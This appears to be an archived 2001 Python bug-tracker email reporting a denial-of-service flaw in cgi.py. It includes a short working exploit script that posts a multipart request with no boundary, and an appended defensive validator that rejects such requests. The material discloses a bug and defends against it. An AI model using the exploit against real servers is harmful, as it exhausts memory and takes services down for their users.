[Python-bugs-list] [ python-Bugs-443120 ] denial-of-service attack to cgi.py

noreply@sourceforge.net noreply@sourceforge.net
Fri, 20 Jul 2001 09:13:58 -0700


Bugs item #443120, was opened at 2001-07-20 09:13
You can respond by visiting: 
http://sourceforge.net/tracker/?func=detail&atid=105470&aid=443120&group_id=5470

Category: Python Library
Group: None
Status: Open
Resolution: None
Priority: 5
Submitted By: Guido van Rossum (gvanrossum)
Assigned to: Nobody/Anonymous (nobody)
Summary: denial-of-service attack to cgi.py

Initial Comment:
I got this in the mail:

"""
Subject: Bug in cgi.py, denial-of-service possible
From: Richard Jones <richard@bizarsoftware.com.au>
To: guido@python.org, support@digicool.com
Date: Fri, 20 Jul 2001 17:43:15 +1000

The inner workings of cgi.py are still a mystery to me, so I can't offer a patch. Sorry.

The following code will effect a denial-of-service against any server running cgi.py (and hence Zope).


import httplib
params = '\n'*10
h = httplib.HTTP('localhost', 8080)
h.putrequest('POST', '/')
h.putheader('Content-type', 'multipart/form-data')
h.putheader('Content-length', str(len(params)))
h.endheaders()
h.send(params)


The key here is the missing boundary from the content-type header. From my observation, it seems that cgi.py defaults the boundary to "" which means that it matches boundaries without progressing through the input - creating new FieldStorage instances for each match. The result is all available RAM gobbled up eventually. I recommend testing this on a system on which you can easily kill the server process.



    Richard

-- 
Richard Jones
richard@bizarsoftware.com.au
Senior Software Developer, Bizar Software
(www.bizarsoftware.com.au)
"""

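As an added illustration, not part of the report above or of cgi.py itself: a server-side pre-check that rejects a multipart request whose Content-Type header carries no usable boundary before the body is handed to the form parser. The boundary character rules follow RFC 2046 (1 to 70 characters from a restricted set, no trailing space); the function names are mine.

```python
import re

# RFC 2046 "bchars": up to 69 characters from the allowed set followed by one
# final allowed character that is not a space.  An empty string cannot match.
_BOUNDARY_RE = re.compile(r"^[0-9A-Za-z'()+_,\-./:=? ]{0,69}[0-9A-Za-z'()+_,\-./:=?]$")


def parse_content_type(header):
    """Split 'type/subtype; k=v; k2="quoted v"' into (mediatype, {param: value})."""
    parts = [p.strip() for p in header.split(";")]
    mediatype = parts[0].lower()
    params = {}
    for part in parts[1:]:
        if "=" not in part:
            continue  # tolerate a malformed parameter rather than crash
        key, value = part.split("=", 1)
        value = value.strip()
        if len(value) >= 2 and value[0] == value[-1] == '"':
            value = value[1:-1]  # strip a quoted-string's surrounding quotes
        params[key.strip().lower()] = value
    return mediatype, params


def multipart_boundary_ok(header):
    """Return (ok, reason).  Non-multipart bodies pass; multipart bodies must
    carry a boundary that is present, non-empty and made of legal characters,
    so a missing or "" boundary never reaches the multipart reader."""
    mediatype, params = parse_content_type(header)
    if not mediatype.startswith("multipart/"):
        return True, "not multipart"
    boundary = params.get("boundary")
    if boundary is None:
        return False, "multipart without boundary parameter"
    if not _BOUNDARY_RE.match(boundary):
        return False, "boundary empty or contains illegal characters"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample headers: the request from the report, and a normal one.
    for ct in ("multipart/form-data",
               'multipart/form-data; boundary=""',
               "multipart/form-data; boundary=----FormBoundaryExample1234"):
        print(ct, "->", multipart_boundary_ok(ct))
```

A request that fails the check should be answered with 400 Bad Request and its body discarded unread.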
